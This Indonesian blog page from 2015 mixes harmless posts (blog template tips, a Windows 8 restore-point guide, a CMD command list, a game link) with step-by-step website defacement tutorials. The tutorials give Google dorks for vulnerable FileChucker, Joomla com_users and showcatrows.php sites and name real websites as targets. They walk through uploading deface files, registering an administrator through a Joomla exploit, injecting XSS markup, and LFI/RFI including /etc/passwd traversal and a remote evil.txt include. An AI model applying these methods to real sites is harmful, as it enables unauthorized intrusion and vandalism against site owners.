Kamis, 18 Juni 2015

Script Deface Website Sederhana Tapi Keren

Download >>>>>Download<<<<<
Script 1 (dengan lagu Indonesia Raya)
Original by Indonesian Security Tester
Modded by Dimzvers (Saya)
Screenshot




Script 2
Teks Berjalan, Warna Hijau
Original by (Indonesian Stealth Cyber Army)
Modded by (Saya)
Screenshot



Deface dengan metode Exploit FileChucker

FileChucker merupakan salah satu pluggin wordpress yang memiliki celah file upload. Defacer tanpa login dapat mengupload file ke website target dengan memanfaatkan celah pada plugin ini.
Dork yang dapat digunakan:
inurl:/cgi-bin/filechucker.cgi
intext:Toptown File Upload
inurl:/cgi-bin/filechucker.pl
intext:File Upload by Encodable
Masukkan dorknya ke kotak pencarian google, maka target – target akan muncul seperti dibawah ini.


Saya memilih salah satu target yaitu http://www.bellblue.com/cgi-bin/filechucker.cgi
Lalu setelah dibuka isi semua form yang kosong (diisi asal-asalan juga tidak apa apa)


Lalu pada kolom pilih file, upload script deface anda yang berformat HTML atau txt


Lalu klik Begin Upload, jika upload sukses maka tampilan seperti ini


Untuk melihat filenya masukan URL http://site.com/upload/files/file_mu
Contoh : http://www.bellblue.com/upload/files/dimz.txt/
Bagi yg belum punya download punya saya Di Sini

-Dimzvers-

Tutorial Singkat LFI & RFI


Sebelumnya apa sih LFI dan RFI itu??


LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:


Code:
include();
include_once();
require();
require_once();

Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,

Code:
<?php
  include "../$_GET[imagefile]";
  ?>

misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya
Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.


nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target hahahhh... "The..."

tapi seandainya terdapat error seperti di bawah ini:

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini
Code:
Code:

  <?php
  include($_GET[imagefile].".php");
  ?>

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.

Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi "hacked by n4is3n"

jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.


Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,
Code:
include("./"$_GET[imagefile].".php");

maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tersebut.

-Dimzvers-

Deface Dengan Teknik com_user

Teknik com_users ini prinsip kerjanya adalah halaman yang digunakan untuk mendaftar sebagai admin pada situs joomla. Bug com_users banyak ditemukan pada joomla versi 1.6 dan 1.7.
Gunakan dork dibawah ini di google.
· inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br
·         site:com inurl:Home Page Beez joomla 1.6 index.php using-joomla
·         inurl:index.php joomla! 1.7 - open source content management site:
·      inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com
·         intext:joomla! 1.7 - open source content management site:jp
·         inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id
·         inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as
·         inurl:index.php/19-sample-data-articles/joomla site:com
Copy dork diatas dan paste di kotak pencarian di google. Cari targetnya sesuai hasil pencarian.
Misal disini saya memakai contoh website http://www.cognobase.com/cms/.
kita buka halaman administratornya untuk mengetahui situs tersebut apakah vuln atau tidak.
Kalau 2 garis dibawah situs saling berdekatan seperti dibawah ini, berarti vuln (memiliki celah com_users)

Sekarang download dulu exploit joomla disinihttp://www.mediafire.com/view/q1zdfkwlez84qwr/Exploit_Joomla.html


Explot: index.php?option=com_users&view=registration
Seperti dibawah ini site_target.com/ index.php?option=com_users&view=registration


Kemudian akan muncul halaman pendaftaran. Kebetulan itu website demonya pake bahasa apa ini gak jelas. Hehe, tapi intinya sama aja.
Setalah muncul halaman pendaftarannya, tekan CTRL + U.


Selanjutnya tekan CTRL + F (untuk mengaktifkan fitur find). Kemudian ketik hidden pada kotak pencarian, klik Next.

Maka hasilnya seperti dibawah ini.
Copy token dan urlnya seperti gambar dibawah ini.


Buka exploit joomla yang kita download tadi. Klik kanan, kemudian pilih Open With, lalu klik Notepad.


Paste URL dan token dari hasil CTRL + U tadi. Kemudian save.


Double klik Exploit Joomla.html yang tadi kita edit. Kemudian terlihat seperti gambar dibawah ini. Edit username, email, dan password sesuai keinginan kita. Lalu klik Register.

Nanti ada tulisan
“Your account has been created and an activation link has been sent to the email address you entered. Note that you must activate the account by clicking on the activation link when you receive the activation email.”

Sekarang buka email agan dan buka link konfirmasinya.
Setalah itu login ke halaman administrator tadi.

Maka hasilnya seperti ini.

Jika sudah masuk ke halaman admin, bebas deh mau diapain websitenya, klo mau deface index atau salah satu halaman web, pilih Article Manager nanti tinggal pilih salah satu artikel lalau ganti deh isinya dengan script Deface anda.
Bagi yg belum punya download punya saya Di Sini

-Dimzvers-

Cara Deface dengan teknik XSS

XSS atau kepanjangan dari Cross Site Scripting merupakan teknik Hacking Injeksi Code ( Code Injection Attack ), yaitu seorang attacker menginjeksi atau memasukan kode ke HTML atau JavaScript, DLL selanjutnya akan di eksekusi oleh client.

Dork: inurl:"/showcatrows.php?CategoryID="

Gunakan dork diatas untuk mencari target di google.
Contoh : http://2muchvector.com/showcatrows.php?CategoryID=41

Lalu tambahkan script HTML atau Javascript anda di akhir URL
Contoh <marquee><h1>This Site Has Been Hacked</h1></marquee> lalu tekan enter


-Dimzvers-

Selasa, 16 Juni 2015

Beberapa Bahaya Yang Harus Anda Perhatikan Jika Sering Ganti template Blog

Bagi seorang blogger, mancari dan mencoba template bagus, keren, untuk blog sendiri memang sering dilakukan tanpa disadari ada beberapa kekurangan yang terjadi pada Blog kita jika sering ganti template. Apa saja hal hal tersebut..?? Mari kita simak..

1. Semua komentar pada posting bisa hilang.
Pada beberapa template, khususnya yang bukan khusus Blogger, tidak menggunakan kontak komentar blogger atau intensedatabase, sehingga pada template baru komentar akan hilang.

2. Traffic Pengunjung Bisa Menurun
Pengunjung yang baru datang mungkin akan terbiasa dengan tampilan baru blog, karena mereka baru melihat blog anda, nahh bagaimana dengan pengunjung yang sudah langganan..?? Mereka pasti bingung dengan menu menu dan tampilan baru blog anda.

3. Blog Bisa Dibanned Oleh Google
Aktifitas mengganti template blogspot yang terlalu sering bisa mengancam eksistensi dari blog yang kita miliki. Hal ini dikarenakan blog yang terlalu sering diganti templatenya berpotensi untuk dibanned oleh Google. Alasan yang menyebabkan munculnya akibat ini juga kurang begitu jelas. Kita dapat menjadikan SPAM sebagai alasan yang membuat Google merasa curiga hingga akhirnya membanned blog milik kita.

4. Kehilangan Pernak Pernik Blog
Misal pada template sebelumnya anda memasang widget atau gadget pihak ketiga atau berformat HTML/Javascript, nah seselasi memasang template baru widget tersebut akan hilang dan anda pun harus menambahkannya kembali.

5. Penyesuaian Dengan Isi Konten Blog Yang Ribet
Bila ganti template pasti kita harus menyesuaikan lagi posisi widget, gadget, posting, label, atau menu menu pada blog kita seperti Link yang terhubung ke sosial media, Fanage Facebook, atau menu lainnya yang sudah tersedia dari template yang terpasang. Belum lagi kita harus mengindeks ulang blog kita ke Google. Ribet kan..??

Nahh maka dari itu pilihlah template yang menurut anda benar benar bagus dan pas dengan isi blog anda..

Membuat System Restore Manual Pada Win8/8.1

Siang Bloggersszzzz...
Apa kabar bruhh..??
Jumpa lagi di Modder's Blog, kali ini saya akan membagikan sebuah tips untuk membuat manual System Restore atau Restore Point di win8/8.1

Bagi anda pengguna winXP atau 7 pasti gampang banget bikin Restore Point sendiri, tinggal masuk ke Start>All Programs>Accessories>System Tools>Create Restore Point.
Di Windows 8 atau 8.1 caranya jauh berbeda karena System Tools tidak bisa diakses seperti pada win7, nah lalau bagaimana caranya..??

Cukup mudah namun tersembunyi.
Pertama masuk ke 'Charm Bar' klik Settings lalu klik PC Info


Lalu di PC Info Klik System Protection


Lalu klik tombol "Create.."


Lalu isi nama Restore Point yang akan dibuat, misal dengan tanggal, waktu atau bebas


Lalu tunggu hingga selesai, dan Close.



Okehh sekian tips dari saya, semoga membantu ^_^
-Dimzvers-

Sabtu, 13 Juni 2015

Berikut adalah beberapa perintah dasar pada Command Prompt


a                                                                                                                   
ADDUSERS : Tambah  daftar pengguna untuk / dari file CSV
ARP : Address Resolution Protocol
Assoc : Ubah ekstensi file  asosiasi
ASSOCIAT : Salah satu langkah asosiasi file
Attrib : Ubah atribut berkas

b
Bootcfg : Edit Windows boot settings
BROWSTAT : Dapatkan domain, info browser dan PDC

c
CACLS : Ubah file permissions
CALL : Panggil satu program batch yang lain
CD : Mengganti Directory – pindah ke Folder tertentu
Change : Ganti Terminal Server Session properties
CHKDSK : Check Disk – memeriksa dan memperbaiki masalah disk
CHKNTFS : Periksa sistem file NTFS
CHOICE : Menerima input keyboard ke sebuah file batch
CIPHER : Encrypt atau Decrypt file / folder
CleanMgr : Ototmatis membersihkan Temperatur file, recycle bin
CLEARMEM : Hapus kebocoran memori
CLIP : Salin STDIN ke Windows clipboard.
CLS : Menghapus layar (Clear The Screen)
CLUSTER : Windows Clustering
CMD : Start a new CMD shell
COLOR : Mengubah warna dari jendela CMD
COMP : Membandingkan isi dari dua file atau set file
COMPACT : Compress file atau folder pada partisi NTFS
Compress : Compress tunggal file pada partisi NTFS
CON2PRT : Menghubungkan atau memutuskan sambungan dengan Printer
CONVERT : Konversi FAT ke drive NTFS
COPY : Menyalin satu atau lebih file ke lokasi lain
CSCcmd : clien-side caching (Offline Files)
CSVDE : Impor atau Ekspor  Active Directory data

d
DATE : Display atau mengatur tanggal
Defrag : Defragment hard drive
DEL : Menghapus satu atau lebih file
DELPROF : Hapus  profil pengguna NT
DELTREE : Menghapus folder dan semua subfolder
DevCon : Device Manager Command Line Utility
DIR : Menampilkan daftar file dan folder
DIRUSE : Tampilkan penggunaan disk
DISKCOMP : Bandingkan  isi dua floppy disk
Diskcopy : Salin isi dari satu disket ke yang lain
DISKPART : Disk Administrasi
DNSSTAT : DNS Statistik
DOSKEY : Edit baris perintah, ingat perintah, dan membuat macro
DSADD : Tambah User (komputer, group ..) ke direktori aktif
DSQUERY : Daftar item dalam direktori aktif
DSMOD : Ubah user (computer, group ..) di direktori aktif
DSRM : Hapus item dari Active Directory

e
ECHO : Menampilkan pesan di layar
ENDLOCAL : Akhir localisation  perubahan lingkungan dalam file batch
ERASE : Menghapus satu atau lebih file
EVENTCREATE : Tambahkan pesan ke Windows event log
EXIT : Keluar dari skrip arus / rutin dan menetapkan errorlevel
EXPAND : uncompress file
Ekstrak : uncompress file CAB

f
FC : Bandingkan dua file
FIND : Mencari string teks dalam sebuah file
FINDSTR : Cari  string dalam file
FOR / F : pengulangan perintah terhadap satu set file
FOR / F : pengulangan perintah terhadap hasil perintah lain
FOR : pengulangan perintah terhadap semua options Files, Directory, List
FORFILES : Proses Batch beberapa file
FORMAT : Format disk
FREEDISK : Periksa free disk space/disk yang tersisa (dalam bytes)
FSUTIL : File dan Volume utilitas
FTP : File Transfer Protocol
FTYPE : Tampilkan atau memodifikasi jenis file yang digunakan dalam asosiasi ekstensi file

g
GLOBAL : Display keanggotaan kelompok global
GOTO : Direct a batch program untuk melompat ke baris berlabel
GPUPDATE : Update pengaturan Kebijakan Grup

h
HELP : Online Help

i
ICACLS : Ubah file dan folder permissions
IF : kondisional melakukan perintah
IFMEMBER : Apakah pengguna saat ini dalam sebuah NT Workgroup
IPCONFIG : Configure IP

k
KILL : Remove program dari memori

l
LABEL : Edit disk label
LOCAL : Display keanggotaan kelompok-kelompok lokal
LOGEVENT : Menulis teks ke NT event viewer
Logoff : user log off
LOGTIME : log tanggal dan waktu dalam file

m
MAPISEND : Kirim email dari baris perintah
MBSAcli : Baseline Security Analyzer
MEM : Display penggunaan memori
MD : Buat folder baru
MKLINK : Buat link simbolik (linkd)
MODE : Mengkonfigurasi perangkat sistem
MORE : Display output, satu layar pada satu waktu
MOUNTVOL : mengelola volume mount point
MOVE : Pindahkan file dari satu folder ke yang lain
MOVEUSER : Pindahkan pengguna dari satu domain ke domain lainnya
MSG : mengirim pesan atau message
MSIEXEC : Microsoft Windows Installer
MSINFO : Windows NT diagnostics
MSTSC : Terminal Server Connection (Remote Desktop Protocol)
MUNGE : Cari dan Ganti teks dalam file (s)
MV : Copy in-menggunakan file

n
NET : Kelola sumber daya jaringan
NETDOM : Domain Manager
Netsh : Configure Network Interfaces, Windows Firewall & Remote akses
NETSVC : Command-line Service Controller
NBTSTAT : Tampilkan statistik jaringan (NetBIOS over TCP / IP)
NETSTAT : Display networking statistics (TCP / IP)
NOW : Tampilan  saat ini Tanggal dan Waktu
NSLOOKUP : Nama server lookup
NTBACKUP : Backup  folder ke tape
NTRIGHTS : Edit hak user account

p
PATH : Menampilkan atau menetapkan path pencarian untuk file executable
PATHPING : jejak jalur jaringan ditambah paket latensi dan kerugian
PAUSE : memenjarakan(suspend) pengolahan file batch dan menampilkan pesan
perms : Tampilkan izin untuk pengguna
PERFMON : Kinerja Monitor
PING : Menguji koneksi jaringan
POPD : Mengembalikan nilai sebelumnya dari direktori sekarang yang disimpan oleh PUSHD
PORTQRY : Tampilan status ports dan services
Powercfg : Mengkonfigurasi pengaturan daya
PRINT : Mencetak file teks
PRNCNFG : Display, mengkonfigurasi atau mengubah nama printer
PRNMNGR : Tambah, menghapus, daftar printer menetapkan printer default
PROMPT : Mengubah command prompt
PsExec : Proses Execute jarak jauh
PsFile : menampilkan file dibuka dari jarak jauh (remote)
PsGetSid : Menampilkan SID sebuah komputer atau pengguna
PsInfo : Daftar informasi tentang sistem
PsKill : proses mematikan berdasarkan nama atau ID proses
PsList : Daftar informasi rinci tentang proses-proses
PsLoggedOn : siapa saja yang log on (lokal atau melalui resource sharing)
PsLogList : catatan kejadian log
PsPasswd : Ubah sandi account
PsService : Melihat dan mengatur layanan
PsShutdown : Shutdown atau reboot komputer
PsSuspend : proses Suspend
PUSHD : Simpan dan kemudian mengubah direktori sekarang

q
QGREP : Cari file(s) untuk baris yang cocok dengan pola tertentu

r
RASDIAL : Mengelola koneksi RAS
RASPHONE : Mengelola koneksi RAS
Recover : perbaikan file yang rusak dari disk yang rusak
REG : Registry = Read, Set, Export, Hapus kunci dan nilai-nilai
REGEDIT : Impor atau ekspor  pengaturan registry
Regsvr32 : Register atau unregister sebuah DLL
REGINI : Ubah Registry Permissions
REM : Record comments (komentar) di sebuah file batch
REN : Mengubah nama file atau file
REPLACE : Ganti atau memperbarui satu file dengan yang lain
RD : Hapus folder (s)
RMTSHARE : Share folder atau printer
Robocopy : Copy File dan Folder secara sempurna
RUTE : Memanipulasi tabel routing jaringan
RUNAS : Jalankan program di bawah account pengguna yang berbeda
RUNDLL32 : Jalankan perintah DLL (add / remove print connections)

s
SC : Control Layanan
SCHTASKS : Jadwal perintah untuk dijalankan pada waktu tertentu
SCLIST : Tampilkan Layanan NT
SET : Display, set, atau menghapus variabel environment
SETLOCAL : Pengendalian environment visibilitas variabel
SETX : Set variabel environment secara permanen
SFC : Pemeriksa Berkas Sistem
SHARE :  Daftar atau mengedit file share atau share print
SHIFT : Shift posisi digantikan parameter dalam sebuah file batch
SHORTCUT : jendela Buat shortcut (. LNK file)
SHOWGRPS : Daftar NT Workgroups seorang pengguna telah bergabung
SHOWMBRS : Daftar Pengguna yang menjadi anggota dari sebuah Workgroup
SHUTDOWN : Shutdown komputer
SLEEP : Tunggu untuk x detik
SLMGR : Software Licensing Management (Vista/2008)
SOON : Jadwal perintah untuk menjalankan dalam waktu dekat
SORT : Sort input
START : memulai sebuah program atau perintah dalam jendela terpisah
SU : Switch User
SUBINACL : Edit file dan folder Permissions, Kepemilikan dan Domain
SUBST : Associate jalan dengan huruf drive
Systeminfo : Daftar konfigurasi sistem

t
TASKLIST : Daftar menjalankan aplikasi dan services
TASKKILL : Hapus proses yang berjalan dari memori
TIME : Menampilkan atau mengatur waktu sistem
TIMEOUT : penundaan pemrosesan dari sebuah batch file
TITLE : Mengatur judul window untuk sesi cmd.exe
TLIST : daftar tugas dengan path lengkap
TOUCH : mengganti file timestamps
Tracert : Trace route ke sebuah remote host
TREE : tampilan grafis struktur folder
TYPE : Menampilkan isi dari file teks

u
USRSTAT : Daftar domain nama pengguna dan terakhir login

v
VER : Tampilkan versi informasi
VERIFY : Pastikan bahwa file sudah disimpan
VOL : Menampilkan sebuah label disk

w
WHERE : Menempatkan dan menampilkan file dalam sebuah pohon direktori
wHOAMI : Output UserName saat ini dan manajemen domain
WINDIFF : Bandingkan isi dua file atau set file
WINMSD : Sistem Windows diagnostik
WINMSDP : Sistem Windows diagnostik II
WMIC : Perintah WMI

x
XCACLS : Ubah file dan folder permissions
XCOPY : Menyalin file dan folder.

Kamis, 04 Juni 2015

Main Game Online Seru

Hello BLOGGERRRZZZ...!!!
What's up..??

Bosan menjelajahi internet..?? 
Bingung mau ngapain lagi..??
Mending kunjungi link ini deh >>>>>>>>>>http://agar.io/<<<<<<<<<<

Web yang menyediakan game simple tapi seruu... :V

Isi nickname kamu, lalu klik "Play"

Dan rasakan permainan yang bisa bikin kamu greget.. :V